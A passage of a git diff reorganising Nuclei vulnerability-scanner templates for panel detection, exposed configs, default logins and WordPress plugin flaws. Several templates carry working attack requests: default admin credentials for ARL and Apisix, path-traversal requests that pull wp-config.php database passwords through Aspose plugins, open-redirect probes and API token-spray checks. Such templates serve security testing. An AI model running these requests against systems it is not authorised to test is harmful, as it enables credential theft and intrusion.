b/nuclei-templates/Other/api-youtube.yaml @@ -0,0 +1,20 @@ +id: api-youtube +info: + name: YouTube API Test + author: zzeitlin + reference: https://developers.google.com/youtube/v3/docs + severity: info + tags: token-spray,youtube +requests: + - method: GET + path: + - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" + matchers-condition: or + matchers: + - type: word + part: body + words: + - 'quotaExceeded' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/apisix-default-login-491.yaml b/nuclei-templates/Other/apisix-default-login-491.yaml index c16b0c60b1..685f414bf6 100644 --- a/nuclei-templates/Other/apisix-default-login-491.yaml +++ b/nuclei-templates/Other/apisix-default-login-491.yaml @@ -1,13 +1,20 @@ id: apisix-default-login info: - name: Apache Apisix Default Login + name: Apache Apisix Default Admin Login author: pdteam - severity: critical - tags: apisix,apache,default-login + severity: high + description: An Apache Apisix default admin login was discovered. metadata: shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" product: https://apisix.apache.org + reference: + - https://apisix.apache.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: apisix,apache,default-login requests: - raw: - | @@ -35,3 +42,5 @@ requests: - '"token"' - '"code":0' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/apollo-default-login-521.yaml b/nuclei-templates/Other/apollo-default-login-520.yaml similarity index 100% rename from nuclei-templates/Other/apollo-default-login-521.yaml rename to nuclei-templates/Other/apollo-default-login-520.yaml diff --git a/nuclei-templates/Other/apple-app-site-association-524.yaml b/nuclei-templates/Other/apple-app-site-association.yaml similarity index 100% rename from nuclei-templates/Other/apple-app-site-association-524.yaml rename to nuclei-templates/Other/apple-app-site-association.yaml diff --git a/nuclei-templates/Other/appspec-yml-disclosure-527.yaml b/nuclei-templates/Other/appspec-yml-disclosure-527.yaml deleted file mode 100644 index a0229fc7c8..0000000000 --- a/nuclei-templates/Other/appspec-yml-disclosure-527.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: appspec-yml-disclosure - -info: - name: Appspec Yml Disclosure - author: dhiyaneshDk - severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json - tags: exposure,config - -requests: - - method: GET - path: - - "{{BaseURL}}/appspec.yml" - - "{{BaseURL}}/appspec.yaml" - - matchers-condition: and - matchers: - - type: word - words: - - "version:" - - "os:" - - "files:" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/appspec-yml-disclosure-528.yaml b/nuclei-templates/Other/appspec-yml-disclosure-528.yaml new file mode 100644 index 0000000000..0366a46dac --- /dev/null +++ b/nuclei-templates/Other/appspec-yml-disclosure-528.yaml @@ -0,0 +1,24 @@ +id: appspec-yml-disclosure +info: + name: Appspec Yml Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json + tags: exposure,config +requests: + - method: GET + path: + - "{{BaseURL}}/appspec.yml" + - "{{BaseURL}}/appspec.yaml" + matchers-condition: and + matchers: + - type: word + words: + - "version:" + - "os:" + - "files:" + part: body + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/arcgis-panel-530.yaml b/nuclei-templates/Other/arcgis-panel-530.yaml deleted file mode 100644 index b6b6fb7696..0000000000 --- a/nuclei-templates/Other/arcgis-panel-530.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: arcgis-panel - -info: - name: ArcGIS Enterprise Panel - author: Podalirius - severity: info - description: An ArcGIS instance was discovered. - reference: - - https://enterprise.arcgis.com/en/ - classification: - cwe-id: CWE-200 - tags: docs,arcgis,cms,panel - -requests: - - method: GET - path: - - '{{BaseURL}}/portal/portalhelp/en/' - - matchers-condition: and - matchers: - - type: word - words: - - 'ArcGIS Enterprise' - - 'Installation and Deployment' - condition: or - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - ' ([0-9.]+)' - - - type: regex - part: body - group: 2 - regex: - - '(Released Version:[\n\t ]+(([0-9]+(.[0-9]+)?(.[0-9]+)?)([\n\t ]+\([A-Za-z]+[\t ]+20[0-9][0-9]\))?))' - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/arcgis-panel-531.yaml b/nuclei-templates/Other/arcgis-panel-531.yaml new file mode 100644 index 0000000000..8f02ee3245 --- /dev/null +++ b/nuclei-templates/Other/arcgis-panel-531.yaml @@ -0,0 +1,47 @@ +id: arcgis-panel + +info: + name: ArcGIS Enterprise Panel + author: Podalirius + severity: info + tags: docs,arcgis,cms,panel + description: An ArcGIS instance was discovered. + reference: + - https://enterprise.arcgis.com/en/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/portal/portalhelp/en/' + + matchers-condition: and + matchers: + - type: word + words: + - 'ArcGIS Enterprise' + - 'Installation and Deployment' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - ' ([0-9.]+)' + + - type: regex + part: body + group: 2 + regex: + - '(Released Version:[\n\t ]+(([0-9]+(.[0-9]+)?(.[0-9]+)?)([\n\t ]+\([A-Za-z]+[\t ]+20[0-9][0-9]\))?))' + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/arcgis-rest-api-533.yaml b/nuclei-templates/Other/arcgis-rest-api-533.yaml deleted file mode 100644 index b60cfd2026..0000000000 --- a/nuclei-templates/Other/arcgis-rest-api-533.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: arcgis-rest-api - -info: - name: ArcGIS Exposed Docs - author: Podalirius - severity: info - description: ArcGIS documents were discovered. - tags: api,arcgis,cms - reference: - - https://enterprise.arcgis.com/en/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/server/sdk/rest/index.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'ArcGIS REST API' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/arcgis-rest-api.yaml b/nuclei-templates/Other/arcgis-rest-api.yaml new file mode 100644 index 0000000000..897c70d812 --- /dev/null +++ b/nuclei-templates/Other/arcgis-rest-api.yaml @@ -0,0 +1,29 @@ +id: arcgis-rest-api + +info: + name: ArcGIS Exposed Docs + author: Podalirius + severity: info + description: ArcGIS documents were discovered. + reference: + - https://enterprise.arcgis.com/en/ + classification: + cwe-id: CWE-200 + tags: api,arcgis,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/server/sdk/rest/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'ArcGIS REST API' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/argocd-login-534.yaml b/nuclei-templates/Other/argocd-login-534.yaml new file mode 100644 index 0000000000..07b34bdba3 --- /dev/null +++ b/nuclei-templates/Other/argocd-login-534.yaml @@ -0,0 +1,19 @@ +id: argocd-detect + +info: + name: Argo CD Detect + author: Adam Crosser + severity: info + description: Detects the Argo CD website console + tags: tech,argocd + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: body + words: + - 'Argo CD' \ No newline at end of file diff --git a/nuclei-templates/Other/argocd-login.yaml b/nuclei-templates/Other/argocd-login.yaml deleted file mode 100644 index 546bbfd8cc..0000000000 --- a/nuclei-templates/Other/argocd-login.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: argocd-detect - -info: - name: Argo CD Login Panel - author: Adam Crosser,daffainfo - severity: info - description: An Argo CD login panel was discovered. - reference: - - https://argoproj.github.io/cd/ - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.title:"Argo CD" - tags: panel,argocd,login,kubernetes - -requests: - - method: GET - path: - - "{{BaseURL}}/login" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<title>Argo CD' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/arl-default-login-537.yaml b/nuclei-templates/Other/arl-default-login-537.yaml deleted file mode 100644 index 0b8d67077d..0000000000 --- a/nuclei-templates/Other/arl-default-login-537.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: arl-default-login -info: - name: ARL Default Login - author: pikpikcu - severity: high - tags: arl,default-login -requests: - - raw: - - | - POST /api/user/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json; charset=UTF-8 - - {"username":"{{username}}","password":"{{password}}"} - payloads: - username: - - admin - password: - - arlpass - attack: pitchfork - matchers-condition: and - matchers: - - type: word - condition: and - words: - - '"message": "success"' - - '"username": "admin"' - - '"type": "login"' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/arl-default-login.yaml b/nuclei-templates/Other/arl-default-login.yaml new file mode 100644 index 0000000000..50f4ac4d1c --- /dev/null +++ b/nuclei-templates/Other/arl-default-login.yaml @@ -0,0 +1,38 @@ +id: arl-default-login +info: + name: ARL Default Admin Login + author: pikpikcu + description: An ARL default admin login was discovered. + severity: high + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: arl,default-login +requests: + - raw: + - | + POST /api/user/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json; charset=UTF-8 + + {"username":"{{username}}","password":"{{password}}"} + payloads: + username: + - admin + password: + - arlpass + attack: pitchfork + matchers-condition: and + matchers: + - type: word + condition: and + words: + - '"message": "success"' + - '"username": "admin"' + - '"type": "login"' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/arl-default-password-541.yaml b/nuclei-templates/Other/arl-default-password-541.yaml deleted file mode 100644 index 08f426e7da..0000000000 --- a/nuclei-templates/Other/arl-default-password-541.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: arl-default-password - -info: - name: ARL Default Password - author: pikpikcu - severity: high - tags: arl,default-login - -requests: - - method: POST - path: - - "{{BaseURL}}/api/user/login" - headers: - Content-Type: application/json; charset=UTF-8 - body: | - {"username":"admin","password":"arlpass"} - - matchers-condition: and - matchers: - - - type: word - words: - - '"message": "success"' - - '"username": "admin"' - - '"type": "login"' - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/arl-default-password.yaml b/nuclei-templates/Other/arl-default-password.yaml new file mode 100644 index 0000000000..d1be4b04a1 --- /dev/null +++ b/nuclei-templates/Other/arl-default-password.yaml @@ -0,0 +1,25 @@ +id: arl-default-password +info: + name: ARL Default Password + author: pikpikcu + severity: high + tags: arl,default-login +requests: + - method: POST + path: + - "{{BaseURL}}/api/user/login" + headers: + Content-Type: application/json; charset=UTF-8 + body: | + {"username":"admin","password":"arlpass"} + matchers-condition: and + matchers: + - type: word + words: + - '"message": "success"' + - '"username": "admin"' + - '"type": "login"' + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/artica-web-proxy-detect.yaml b/nuclei-templates/Other/artica-web-proxy-detect-544.yaml similarity index 100% rename from nuclei-templates/Other/artica-web-proxy-detect.yaml rename to nuclei-templates/Other/artica-web-proxy-detect-544.yaml diff --git a/nuclei-templates/Other/asana.yaml b/nuclei-templates/Other/asana.yaml new file mode 100644 index 0000000000..b5d4fb3663 --- /dev/null +++ b/nuclei-templates/Other/asana.yaml @@ -0,0 +1,25 @@ +id: api-asana + +info: + name: Asana API Test + author: zzeitlin + reference: https://developers.asana.com/docs/using-terminal + severity: info + + +self-contained: true +requests: + - method: GET + path: + - "https://app.asana.com/api/1.0/users/me" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - 'data:' + - 'email' + - 'name' + condition: and diff --git a/nuclei-templates/Other/aspnuke-openredirect-556.yaml b/nuclei-templates/Other/aspnuke-openredirect-556.yaml new file mode 100644 index 0000000000..ca498927f1 --- /dev/null +++ b/nuclei-templates/Other/aspnuke-openredirect-556.yaml @@ -0,0 +1,17 @@ +id: aspnuke-openredirect + +info: + name: ASP-Nuke Open Redirect + author: pdteam + severity: low + tags: aspnuke,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/gotoURL.asp?url=google.com&id=43569" + matchers: + - type: regex + part: body + regex: + - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?google\.com(?:\s*)$' \ No newline at end of file diff --git a/nuclei-templates/Other/aspnuke-openredirect-557.yaml b/nuclei-templates/Other/aspnuke-openredirect-557.yaml deleted file mode 100644 index 1dcc28d81d..0000000000 --- a/nuclei-templates/Other/aspnuke-openredirect-557.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: aspnuke-openredirect - -info: - name: ASP-Nuke Open Redirect - author: pdteam - severity: low - tags: aspnuke,redirect - -requests: - - method: GET - path: - - "{{BaseURL}}/gotoURL.asp?url=interact.sh&id=43569" - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*)$' \ No newline at end of file diff --git a/nuclei-templates/Other/aspose-file-download-561.yaml b/nuclei-templates/Other/aspose-file-download-561.yaml deleted file mode 100644 index 961f6980ff..0000000000 --- a/nuclei-templates/Other/aspose-file-download-561.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: aspose-file-download -info: - name: Wordpress Aspose Cloud eBook Generator - Arbitrary File Retrieval - author: 0x_Akoko - severity: high - description: The Aspose Cloud eBook Generator WordPress plugin is affected by an arbitrary file retrieval vulnerability. - reference: - - https://wpscan.com/vulnerability/7866 - tags: wordpress,wp-plugin,lfi,aspose,ebook -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php' - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aspose-file-download.yaml b/nuclei-templates/Other/aspose-file-download.yaml new file mode 100644 index 0000000000..d349b9cfed --- /dev/null +++ b/nuclei-templates/Other/aspose-file-download.yaml @@ -0,0 +1,23 @@ +id: aspose-file-download +info: + name: Aspose Cloud eBook Generator - File Download + author: 0x_Akoko + severity: high + description: The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability. + reference: https://wpscan.com/vulnerability/7866 + tags: wordpress,wp-plugin,lfi,aspose,ebook +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php' + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aspose-ie-file-download-565.yaml b/nuclei-templates/Other/aspose-ie-file-download-565.yaml new file mode 100644 index 0000000000..ae52c36233 --- /dev/null +++ b/nuclei-templates/Other/aspose-ie-file-download-565.yaml @@ -0,0 +1,29 @@ +id: aspose-ie-file-download + +info: + name: Wordpress Aspose Importer & Exporter v1.0 - Arbitrary File Retrieval + author: 0x_Akoko + severity: high + description: The Aspose importer and Exporter WordPress plugin is affected by an arbitrary file retrieval vulnerability. + reference: + - https://packetstormsecurity.com/files/131162/ + - https://wordpress.org/plugins/aspose-importer-exporter + tags: wordpress,wp-plugin,lfi,aspose + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aspose-ie-file-download.yaml b/nuclei-templates/Other/aspose-ie-file-download.yaml deleted file mode 100644 index 6f7eefcba3..0000000000 --- a/nuclei-templates/Other/aspose-ie-file-download.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: aspose-ie-file-download -info: - name: WordPress Aspose Importer & Exporter 1.0 - Local File Inclusion - author: 0x_Akoko - severity: high - description: WordPress Aspose Importer & Exporter version 1.0 is vulnerable to local file inclusion. - reference: - - https://packetstormsecurity.com/files/131162/ - - https://wordpress.org/plugins/aspose-importer-exporter - tags: wordpress,wp-plugin,lfi,aspose -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php' - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/01 diff --git a/nuclei-templates/Other/aspose-pdf-file-download-570.yaml b/nuclei-templates/Other/aspose-pdf-file-download-568.yaml similarity index 100% rename from nuclei-templates/Other/aspose-pdf-file-download-570.yaml rename to nuclei-templates/Other/aspose-pdf-file-download-568.yaml diff --git a/nuclei-templates/Other/aspose-words-file-download-571.yaml b/nuclei-templates/Other/aspose-words-file-download-571.yaml deleted file mode 100644 index ac80fecb8c..0000000000 --- a/nuclei-templates/Other/aspose-words-file-download-571.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: aspose-words-file-download - -info: - name: Aspose Words Exporter < 2.0 - Arbitrary File Retrieval - author: 0x_Akoko - severity: high - description: The Aspose.Words Exporter WordPress plugin is affected by an arbitrary file retrieval security vulnerability. - reference: - - https://wpscan.com/vulnerability/7869 - - https://wordpress.org/plugins/aspose-doc-exporter - tags: wordpress,wp-plugin,lfi,aspose - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php' - - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aspose-words-file-download.yaml b/nuclei-templates/Other/aspose-words-file-download.yaml new file mode 100644 index 0000000000..751ec5377e --- /dev/null +++ b/nuclei-templates/Other/aspose-words-file-download.yaml @@ -0,0 +1,31 @@ +id: aspose-words-file-download +info: + name: WordPress Aspose Words Exporter <2.0 - Local File Inclusion + author: 0x_Akoko + severity: high + description: WordPress Aspose Words Exporter prior to version 2.0 is vulnerable to local file inclusion. + reference: + - https://wpscan.com/vulnerability/7869 + - https://wordpress.org/plugins/aspose-doc-exporter + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + tags: wordpress,wp-plugin,lfi,aspose +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php' + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/01 diff --git a/nuclei-templates/Other/aspx-debug-mode.yaml b/nuclei-templates/Other/aspx-debug-mode-575.yaml similarity index 100% rename from nuclei-templates/Other/aspx-debug-mode.yaml rename to nuclei-templates/Other/aspx-debug-mode-575.yaml diff --git a/nuclei-templates/Other/atlassian-crowd-panel-580.yaml b/nuclei-templates/Other/atlassian-crowd-panel-580.yaml index d01a865ee9..3532e9a84c 100644 --- a/nuclei-templates/Other/atlassian-crowd-panel-580.yaml +++ b/nuclei-templates/Other/atlassian-crowd-panel-580.yaml @@ -1,16 +1,25 @@ id: atlassian-crowd-panel + info: - name: Atlassian Crowd panel detect + name: Atlassian Crowd Login Panel author: organiccrap - severity: low + severity: info + description: An Atlassian Crowd login panel was discovered. + reference: + - https://www.atlassian.com/ + classification: + cwe-id: CWE-200 + tags: panel,atlassian + requests: - method: GET path: - '{{BaseURL}}/crowd/console/login.action' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: - type: word words: - Atlassian Crowd - Login part: body + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/attitude-theme-open-redirect-586.yaml b/nuclei-templates/Other/attitude-theme-open-redirect-586.yaml new file mode 100644 index 0000000000..3dbd07b8b7 --- /dev/null +++ b/nuclei-templates/Other/attitude-theme-open-redirect-586.yaml @@ -0,0 +1,21 @@ +id: attitude-theme-open-redirect + +info: + name: WordPress Attitude Themes 1.1.1 Open Redirection + author: 0x_Akoko + severity: low + description: A vulnerability in WordPress Attitude Themes allows remote attackers to inject an arbitrary URL into the 'goto.php' endpoint which will redirect the victim to it. + reference: + - https://cxsecurity.com/issue/WLB-2020030185 + tags: wordpress,wp-theme,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/themes/Attitude/go.php?https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header diff --git a/nuclei-templates/Other/attitude-theme-open-redirect.yaml b/nuclei-templates/Other/attitude-theme-open-redirect.yaml deleted file mode 100644 index 27dc936559..0000000000 --- a/nuclei-templates/Other/attitude-theme-open-redirect.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: attitude-theme-open-redirect - -info: - name: WordPress Attitude Themes 1.1.1 Open Redirection - author: 0x_Akoko - severity: low - description: A vulnerability in WordPress Attitude Themes allows remote attackers to inject an arbitrary URL into the 'goto.php' endpoint which will redirect the victim to it. - reference: https://cxsecurity.com/issue/WLB-2020030185 - tags: wordpress,wp-theme,redirect - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/themes/Attitude/go.php?https://example.com/" - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header diff --git a/nuclei-templates/Other/atvise-login-589.yaml b/nuclei-templates/Other/atvise-login-589.yaml new file mode 100644 index 0000000000..bc58bf1715 --- /dev/null +++ b/nuclei-templates/Other/atvise-login-589.yaml @@ -0,0 +1,33 @@ +id: atvise-login + +info: + name: Atvise Login Panel + author: idealphase + severity: info + description: An Atvise login panel was discovered. Atvise is a leading visualization and control center solutions based on pure web technology. + reference: + - https://www.exploit-db.com/ghdb/7837 + - https://www.atvise.com/en + classification: + cwe-id: CWE-200 + metadata: + google-dork: intitle:"atvise - next generation" + tags: panel,atvise + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'atvise - next generation' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/atvise-login-591.yaml b/nuclei-templates/Other/atvise-login-591.yaml deleted file mode 100644 index 74ba38fb08..0000000000 --- a/nuclei-templates/Other/atvise-login-591.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: atvise-login - -info: - name: Atvise Login Panel - author: idealphase - severity: info - description: An Atvise login panel was discovered. Atvise is a leading visualization and control center solutions based on pure web technology. - reference: - - https://www.exploit-db.com/ghdb/7837 - - https://www.atvise.com/en - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - metadata: - google-dork: intitle:"atvise - next generation" - tags: panel,atvise - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'atvise - next generation' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/automation-direct-596.yaml b/nuclei-templates/Other/automation-direct-597.yaml similarity index 100% rename from nuclei-templates/Other/automation-direct-596.yaml rename to nuclei-templates/Other/automation-direct-597.yaml diff --git a/nuclei-templates/Other/avantfax-panel-603.yaml b/nuclei-templates/Other/avantfax-panel.yaml similarity index 100% rename from nuclei-templates/Other/avantfax-panel-603.yaml rename to nuclei-templates/Other/avantfax-panel.yaml diff --git a/nuclei-templates/Other/avatier-password-management-605.yaml b/nuclei-templates/Other/avatier_password_management.yaml similarity index 100% rename from nuclei-templates/Other/avatier-password-management-605.yaml rename to nuclei-templates/Other/avatier_password_management.yaml diff --git a/nuclei-templates/Other/aviatrix-panel-609.yaml b/nuclei-templates/Other/aviatrix-panel-609.yaml deleted file mode 100644 index e8c89b1cca..0000000000 --- a/nuclei-templates/Other/aviatrix-panel-609.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: aviatrix-panel - -info: - name: Aviatrix Panel Login - author: pikpikcu,philippedelteil,daffainfo - severity: info - metadata: - shodan-query: http.title:"Aviatrix Cloud Controller" - tags: panel,aviatrix - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/assets/img/favicon-32x32.png" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: dsl - name: "title" - condition: and - dsl: - - 'contains(body, "Aviatrix")' - - 'contains(body, "Controller")' - - 'status_code == 200' - - - type: dsl - name: "favicon" - dsl: - - "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))" diff --git a/nuclei-templates/Other/aviatrix-panel-610.yaml b/nuclei-templates/Other/aviatrix-panel-610.yaml new file mode 100644 index 0000000000..65416dba45 --- /dev/null +++ b/nuclei-templates/Other/aviatrix-panel-610.yaml @@ -0,0 +1,40 @@ +id: aviatrix-panel + +info: + name: Aviatrix Cloud Controller Panel Login + author: pikpikcu,philippedelteil,daffainfo + severity: info + description: An Aviatrix Cloud Controller login panel was detected. + reference: + - https://docs.aviatrix.com/HowTos/controller_config.html + metadata: + shodan-query: http.title:"Aviatrix Cloud Controller" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + tags: panel,aviatrix + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/assets/img/favicon-32x32.png" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: dsl + name: "title" + condition: and + dsl: + - 'contains(body, "Aviatrix")' + - 'contains(body, "Controller")' + - 'status_code == 200' + + - type: dsl + name: "favicon" + dsl: + - "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))" + +# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/Other/avtech-avn801-camera-panel-611.yaml b/nuclei-templates/Other/avtech-avn801-camera-panel.yaml similarity index 100% rename from nuclei-templates/Other/avtech-avn801-camera-panel-611.yaml rename to nuclei-templates/Other/avtech-avn801-camera-panel.yaml diff --git a/nuclei-templates/Other/avtech-dvr-exposure-614.yaml b/nuclei-templates/Other/avtech-dvr-exposure-617.yaml similarity index 100% rename from nuclei-templates/Other/avtech-dvr-exposure-614.yaml rename to nuclei-templates/Other/avtech-dvr-exposure-617.yaml diff --git a/nuclei-templates/Other/aws-access-id-620.yaml b/nuclei-templates/Other/aws-access-id.yaml similarity index 100% rename from nuclei-templates/Other/aws-access-id-620.yaml rename to nuclei-templates/Other/aws-access-id.yaml diff --git a/nuclei-templates/Other/aws-access-key-value-621.yaml b/nuclei-templates/Other/aws-access-key-value-624.yaml similarity index 100% rename from nuclei-templates/Other/aws-access-key-value-621.yaml rename to nuclei-templates/Other/aws-access-key-value-624.yaml diff --git a/nuclei-templates/Other/aws-bucket-takeover-630.yaml b/nuclei-templates/Other/aws-bucket-takeover-630.yaml index 4a7e880937..d08136f8cb 100644 --- a/nuclei-templates/Other/aws-bucket-takeover-630.yaml +++ b/nuclei-templates/Other/aws-bucket-takeover-630.yaml @@ -1,5 +1,4 @@ id: aws-bucket-takeover - info: name: AWS Bucket Takeover Detection author: pdteam @@ -7,18 +6,15 @@ info: reference: - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover,aws,bucket - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word words: - "The specified bucket does not exist" - - type: dsl dsl: - contains(tolower(all_headers), 'x-guploader-uploadid') diff --git a/nuclei-templates/Other/aws-cloudfront-service-634.yaml b/nuclei-templates/Other/aws-cloudfront-service-634.yaml new file mode 100644 index 0000000000..26ab05d613 --- /dev/null +++ b/nuclei-templates/Other/aws-cloudfront-service-634.yaml @@ -0,0 +1,22 @@ +id: aws-cloudfront-service + +info: + name: AWS Cloudfront service detection + author: jiheon-dev + severity: info + description: Detect websites using AWS cloudfront service + tags: aws,tech,service + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + condition: or + dsl: + - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: error from cloudfront')" diff --git a/nuclei-templates/Other/aws-cloudfront-service.yaml b/nuclei-templates/Other/aws-cloudfront-service.yaml deleted file mode 100644 index b247e81533..0000000000 --- a/nuclei-templates/Other/aws-cloudfront-service.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: aws-cloudfront-service - -info: - name: AWS Cloudfront service detection - author: jiheon-dev - severity: info - tags: aws,tech,service - description: Detect websites using AWS cloudfront service - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: dsl - condition: or - dsl: - - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" - 